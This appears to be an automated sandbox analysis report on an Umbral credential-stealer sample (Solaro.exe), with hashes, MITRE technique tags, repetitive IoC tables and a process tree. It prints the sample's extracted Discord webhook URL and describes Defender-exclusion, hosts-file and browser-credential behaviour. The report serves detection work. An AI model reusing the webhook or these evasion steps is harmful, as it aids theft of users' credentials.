umbral | 80a2a856062d5fdfc9a8d3f68fe717e5128f87ea9fe286e545f45886e1c4ab17

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26-06-2024 08:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Solaro.exe
Size

513KB
MD5

b9a7b8d97ac9e492b592e723c47f3f71
SHA1

840d72ade351c907ef21ffc9c87f948016219286
SHA256

80a2a856062d5fdfc9a8d3f68fe717e5128f87ea9fe286e545f45886e1c4ab17
SHA512

4c1cc3b0ef59a4689d2b70778360737c9fc86b4ed0395f303cf4a9a3ae27a1aee8b1140907953c12ba58ffac7709d9e895578a64dd0547f5d14c4cd5d29ae1e9
SSDEEP

12288:cSgkiATxhl6E41yG5uuo0kD4qiGLJROQZZMQPX:3gkiAUhRYuw4HG9XZ+

Score

10^/10

umbral execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1255440152264708116/e78YrGll2h6-MFL5WBXh0buoJQb4Q69Z5cO34I92dvicPnzPfxpjHhlb2KFfvFVxGUhf

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0007000000023421-23.dat	family_umbral
behavioral2/memory/3388-25-0x000001DE15BB0000-0x000001DE15BF0000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 24 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4748	powershell.exe
3860	powershell.exe
536	powershell.exe
2368	powershell.exe
2620	powershell.exe
1892	powershell.exe
4288	powershell.exe
4016	powershell.exe
4456	powershell.exe
4768	powershell.exe
3224	powershell.exe
2972	powershell.exe
3224	powershell.exe
4392	powershell.exe
5052	powershell.exe
3084	powershell.exe
2732	powershell.exe
1252	powershell.exe
1752	powershell.exe
1056	powershell.exe
4904	powershell.exe
4440	powershell.exe
1360	powershell.exe
208	powershell.exe

Drops file in Drivers directory 24 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Umbral.exe

Checks computer location settings 2 TTPs 64 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	Solaro.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation	SolaroB.exe

Executes dropped EXE 64 IoCs

pid	Process
4332	SolaroB.exe
3388	Umbral.exe
2032	SolaroB.exe
4560	Umbral.exe
4552	SolaroB.exe
3628	Umbral.exe
3932	SolaroB.exe
4084	Umbral.exe
5024	SolaroB.exe
3692	Umbral.exe
4488	SolaroB.exe
876	Umbral.exe
1876	SolaroB.exe
1532	Umbral.exe
688	SolaroB.exe
3988	Umbral.exe
548	SolaroB.exe
4428	Umbral.exe
2268	SolaroB.exe
1080	Umbral.exe
2408	SolaroB.exe
536	Umbral.exe
3972	SolaroB.exe
2748	Umbral.exe
1360	SolaroB.exe
1228	Umbral.exe
1860	SolaroB.exe
1904	Umbral.exe
1876	SolaroB.exe
3968	Umbral.exe
1112	SolaroB.exe
1180	Umbral.exe
1084	SolaroB.exe
2900	Umbral.exe
464	SolaroB.exe
1776	Umbral.exe
2360	SolaroB.exe
4088	Umbral.exe
812	SolaroB.exe
3376	Umbral.exe
3928	SolaroB.exe
1388	Umbral.exe
4880	SolaroB.exe
3112	Umbral.exe
1672	SolaroB.exe
4800	Umbral.exe
1016	SolaroB.exe
4116	Umbral.exe
2856	SolaroB.exe
3124	Umbral.exe
1112	SolaroB.exe
884	Umbral.exe
4432	SolaroB.exe
4336	Umbral.exe
876	SolaroB.exe
1520	Umbral.exe
3724	SolaroB.exe
4300	Umbral.exe
3820	SolaroB.exe
1688	Umbral.exe
2856	SolaroB.exe
3620	Umbral.exe
4532	SolaroB.exe
2456	Umbral.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 48 IoCs

Web Service

T1102

flow	ioc
171	discord.com
229	discord.com
54	discord.com
98	discord.com
105	discord.com
115	discord.com
123	discord.com
230	discord.com
77	discord.com
163	discord.com
192	discord.com
211	discord.com
212	discord.com
198	discord.com
218	discord.com
47	discord.com
85	discord.com
122	discord.com
136	discord.com
191	discord.com
129	discord.com
144	discord.com
21	discord.com
78	discord.com
84	discord.com
99	discord.com
106	discord.com
37	discord.com
39	discord.com
91	discord.com
199	discord.com
219	discord.com
178	discord.com
20	discord.com
55	discord.com
130	discord.com
156	discord.com
177	discord.com
46	discord.com
92	discord.com
145	discord.com
155	discord.com
185	discord.com
116	discord.com
137	discord.com
164	discord.com
170	discord.com
184	discord.com

Looks up external IP address via web service 24 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
88	ip-api.com
95	ip-api.com
174	ip-api.com
51	ip-api.com
111	ip-api.com
188	ip-api.com
141	ip-api.com
195	ip-api.com
204	ip-api.com
215	ip-api.com
222	ip-api.com
102	ip-api.com
126	ip-api.com
133	ip-api.com
59	ip-api.com
81	ip-api.com
119	ip-api.com
148	ip-api.com
159	ip-api.com
15	ip-api.com
25	ip-api.com
43	ip-api.com
167	ip-api.com
181	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 24 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1872	wmic.exe
3436	wmic.exe
2856	wmic.exe
3092	wmic.exe
4784	wmic.exe
4452	wmic.exe
3308	wmic.exe
1292	wmic.exe
628	wmic.exe
3700	wmic.exe
4616	wmic.exe
4668	wmic.exe
628	wmic.exe
556	wmic.exe
2144	wmic.exe
688	wmic.exe
3144	wmic.exe
768	wmic.exe
4656	wmic.exe
552	wmic.exe
2904	wmic.exe
3636	wmic.exe
4344	wmic.exe
856	wmic.exe

Runs ping.exe 1 TTPs 24 IoCs

Remote System Discovery

T1018

pid	Process
3196	PING.EXE
1688	PING.EXE
3860	PING.EXE
1088	PING.EXE
5068	PING.EXE
2964	PING.EXE
4616	PING.EXE
3084	PING.EXE
808	PING.EXE
2436	PING.EXE
808	PING.EXE
4908	PING.EXE
2980	PING.EXE
1888	PING.EXE
4016	PING.EXE
5096	PING.EXE
684	PING.EXE
2280	PING.EXE
3268	PING.EXE
1104	PING.EXE
4472	PING.EXE
4040	PING.EXE
1028	PING.EXE
4348	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3388	Umbral.exe
1752	powershell.exe
1752	powershell.exe
4668	powershell.exe
4668	powershell.exe
2160	powershell.exe
2160	powershell.exe
3656	powershell.exe
3656	powershell.exe
5068	powershell.exe
5068	powershell.exe
4084	Umbral.exe
3224	powershell.exe
3224	powershell.exe
2980	powershell.exe
2980	powershell.exe
436	powershell.exe
436	powershell.exe
540	powershell.exe
540	powershell.exe
388	powershell.exe
388	powershell.exe
1532	Umbral.exe
4288	powershell.exe
4288	powershell.exe
3692	powershell.exe
3692	powershell.exe
4324	powershell.exe
4324	powershell.exe
4904	powershell.exe
4904	powershell.exe
2688	powershell.exe
2688	powershell.exe
1080	Umbral.exe
4016	powershell.exe
4016	powershell.exe
3028	powershell.exe
3028	powershell.exe
1724	powershell.exe
1724	powershell.exe
3000	powershell.exe
3000	powershell.exe
4424	powershell.exe
4424	powershell.exe
1228	Umbral.exe
1056	powershell.exe
1056	powershell.exe
768	powershell.exe
768	powershell.exe
1520	powershell.exe
1520	powershell.exe
4568	powershell.exe
4568	powershell.exe
4232	powershell.exe
4232	powershell.exe
1180	Umbral.exe
4748	powershell.exe
4748	powershell.exe
3148	powershell.exe
3148	powershell.exe
3440	powershell.exe
3440	powershell.exe
4116	powershell.exe
4116	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3388	Umbral.exe
Token: SeIncreaseQuotaPrivilege	1848	wmic.exe
Token: SeSecurityPrivilege	1848	wmic.exe
Token: SeTakeOwnershipPrivilege	1848	wmic.exe
Token: SeLoadDriverPrivilege	1848	wmic.exe
Token: SeSystemProfilePrivilege	1848	wmic.exe
Token: SeSystemtimePrivilege	1848	wmic.exe
Token: SeProfSingleProcessPrivilege	1848	wmic.exe
Token: SeIncBasePriorityPrivilege	1848	wmic.exe
Token: SeCreatePagefilePrivilege	1848	wmic.exe
Token: SeBackupPrivilege	1848	wmic.exe
Token: SeRestorePrivilege	1848	wmic.exe
Token: SeShutdownPrivilege	1848	wmic.exe
Token: SeDebugPrivilege	1848	wmic.exe
Token: SeSystemEnvironmentPrivilege	1848	wmic.exe
Token: SeRemoteShutdownPrivilege	1848	wmic.exe
Token: SeUndockPrivilege	1848	wmic.exe
Token: SeManageVolumePrivilege	1848	wmic.exe
Token: 33	1848	wmic.exe
Token: 34	1848	wmic.exe
Token: 35	1848	wmic.exe
Token: 36	1848	wmic.exe
Token: SeIncreaseQuotaPrivilege	1848	wmic.exe
Token: SeSecurityPrivilege	1848	wmic.exe
Token: SeTakeOwnershipPrivilege	1848	wmic.exe
Token: SeLoadDriverPrivilege	1848	wmic.exe
Token: SeSystemProfilePrivilege	1848	wmic.exe
Token: SeSystemtimePrivilege	1848	wmic.exe
Token: SeProfSingleProcessPrivilege	1848	wmic.exe
Token: SeIncBasePriorityPrivilege	1848	wmic.exe
Token: SeCreatePagefilePrivilege	1848	wmic.exe
Token: SeBackupPrivilege	1848	wmic.exe
Token: SeRestorePrivilege	1848	wmic.exe
Token: SeShutdownPrivilege	1848	wmic.exe
Token: SeDebugPrivilege	1848	wmic.exe
Token: SeSystemEnvironmentPrivilege	1848	wmic.exe
Token: SeRemoteShutdownPrivilege	1848	wmic.exe
Token: SeUndockPrivilege	1848	wmic.exe
Token: SeManageVolumePrivilege	1848	wmic.exe
Token: 33	1848	wmic.exe
Token: 34	1848	wmic.exe
Token: 35	1848	wmic.exe
Token: 36	1848	wmic.exe
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	2160	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeIncreaseQuotaPrivilege	4520	wmic.exe
Token: SeSecurityPrivilege	4520	wmic.exe
Token: SeTakeOwnershipPrivilege	4520	wmic.exe
Token: SeLoadDriverPrivilege	4520	wmic.exe
Token: SeSystemProfilePrivilege	4520	wmic.exe
Token: SeSystemtimePrivilege	4520	wmic.exe
Token: SeProfSingleProcessPrivilege	4520	wmic.exe
Token: SeIncBasePriorityPrivilege	4520	wmic.exe
Token: SeCreatePagefilePrivilege	4520	wmic.exe
Token: SeBackupPrivilege	4520	wmic.exe
Token: SeRestorePrivilege	4520	wmic.exe
Token: SeShutdownPrivilege	4520	wmic.exe
Token: SeDebugPrivilege	4520	wmic.exe
Token: SeSystemEnvironmentPrivilege	4520	wmic.exe
Token: SeRemoteShutdownPrivilege	4520	wmic.exe
Token: SeUndockPrivilege	4520	wmic.exe
Token: SeManageVolumePrivilege	4520	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 532 wrote to memory of 4332	532	Solaro.exe	81
PID 532 wrote to memory of 4332	532	Solaro.exe	81
PID 532 wrote to memory of 3388	532	Solaro.exe	82
PID 532 wrote to memory of 3388	532	Solaro.exe	82
PID 3388 wrote to memory of 1848	3388	Umbral.exe	83
PID 3388 wrote to memory of 1848	3388	Umbral.exe	83
PID 3388 wrote to memory of 2096	3388	Umbral.exe	88
PID 3388 wrote to memory of 2096	3388	Umbral.exe	88
PID 3388 wrote to memory of 1752	3388	Umbral.exe	90
PID 3388 wrote to memory of 1752	3388	Umbral.exe	90
PID 3388 wrote to memory of 4668	3388	Umbral.exe	92
PID 3388 wrote to memory of 4668	3388	Umbral.exe	92
PID 3388 wrote to memory of 2160	3388	Umbral.exe	95
PID 3388 wrote to memory of 2160	3388	Umbral.exe	95
PID 4332 wrote to memory of 2032	4332	SolaroB.exe	97
PID 4332 wrote to memory of 2032	4332	SolaroB.exe	97
PID 3388 wrote to memory of 3656	3388	Umbral.exe	98
PID 3388 wrote to memory of 3656	3388	Umbral.exe	98
PID 4332 wrote to memory of 4560	4332	SolaroB.exe	100
PID 4332 wrote to memory of 4560	4332	SolaroB.exe	100
PID 3388 wrote to memory of 4520	3388	Umbral.exe	101
PID 3388 wrote to memory of 4520	3388	Umbral.exe	101
PID 3388 wrote to memory of 4948	3388	Umbral.exe	103
PID 3388 wrote to memory of 4948	3388	Umbral.exe	103
PID 3388 wrote to memory of 4424	3388	Umbral.exe	105
PID 3388 wrote to memory of 4424	3388	Umbral.exe	105
PID 2032 wrote to memory of 4552	2032	SolaroB.exe	107
PID 2032 wrote to memory of 4552	2032	SolaroB.exe	107
PID 3388 wrote to memory of 5068	3388	Umbral.exe	108
PID 3388 wrote to memory of 5068	3388	Umbral.exe	108
PID 2032 wrote to memory of 3628	2032	SolaroB.exe	110
PID 2032 wrote to memory of 3628	2032	SolaroB.exe	110
PID 3388 wrote to memory of 2904	3388	Umbral.exe	111
PID 3388 wrote to memory of 2904	3388	Umbral.exe	111
PID 3388 wrote to memory of 3312	3388	Umbral.exe	114
PID 3388 wrote to memory of 3312	3388	Umbral.exe	114
PID 3312 wrote to memory of 4348	3312	cmd.exe	116
PID 3312 wrote to memory of 4348	3312	cmd.exe	116
PID 4552 wrote to memory of 3932	4552	SolaroB.exe	117
PID 4552 wrote to memory of 3932	4552	SolaroB.exe	117
PID 4552 wrote to memory of 4084	4552	SolaroB.exe	118
PID 4552 wrote to memory of 4084	4552	SolaroB.exe	118
PID 4084 wrote to memory of 1000	4084	Umbral.exe	119
PID 4084 wrote to memory of 1000	4084	Umbral.exe	119
PID 4084 wrote to memory of 1904	4084	Umbral.exe	123
PID 4084 wrote to memory of 1904	4084	Umbral.exe	123
PID 4084 wrote to memory of 3224	4084	Umbral.exe	125
PID 4084 wrote to memory of 3224	4084	Umbral.exe	125
PID 4084 wrote to memory of 2980	4084	Umbral.exe	127
PID 4084 wrote to memory of 2980	4084	Umbral.exe	127
PID 4084 wrote to memory of 436	4084	Umbral.exe	129
PID 4084 wrote to memory of 436	4084	Umbral.exe	129
PID 3932 wrote to memory of 5024	3932	SolaroB.exe	131
PID 3932 wrote to memory of 5024	3932	SolaroB.exe	131
PID 4084 wrote to memory of 540	4084	Umbral.exe	132
PID 4084 wrote to memory of 540	4084	Umbral.exe	132
PID 3932 wrote to memory of 3692	3932	SolaroB.exe	134
PID 3932 wrote to memory of 3692	3932	SolaroB.exe	134
PID 4084 wrote to memory of 4300	4084	Umbral.exe	135
PID 4084 wrote to memory of 4300	4084	Umbral.exe	135
PID 4084 wrote to memory of 3112	4084	Umbral.exe	137
PID 4084 wrote to memory of 3112	4084	Umbral.exe	137
PID 4084 wrote to memory of 4944	4084	Umbral.exe	139
PID 4084 wrote to memory of 4944	4084	Umbral.exe	139

Views/modifies file attributes 1 TTPs 24 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1872	attrib.exe
1564	attrib.exe
2360	attrib.exe
1028	attrib.exe
2436	attrib.exe
4600	attrib.exe
1896	attrib.exe
4360	attrib.exe
2968	attrib.exe
3588	attrib.exe
2416	attrib.exe
3552	attrib.exe
2096	attrib.exe
1768	attrib.exe
1904	attrib.exe
1756	attrib.exe
4496	attrib.exe
4336	attrib.exe
1604	attrib.exe
2264	attrib.exe
3868	attrib.exe
2728	attrib.exe
4144	attrib.exe
1904	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Solaro.exe
"C:\Users\Admin\AppData\Local\Temp\Solaro.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:532
- C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
  "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4332
- - C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
      "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4552
    - - C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:3932
      - C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:5024
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:4488
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        9⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:688
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:548
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        11⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2268
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        12⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:2408
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        13⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:3972
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        14⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1360
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        15⤵
        Executes dropped EXE
        
        PID:1860
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        16⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1876
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        17⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1112
        
        C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
        18⤵
        Checks computer location settings
        Executes dropped EXE
        
        PID:1084
        
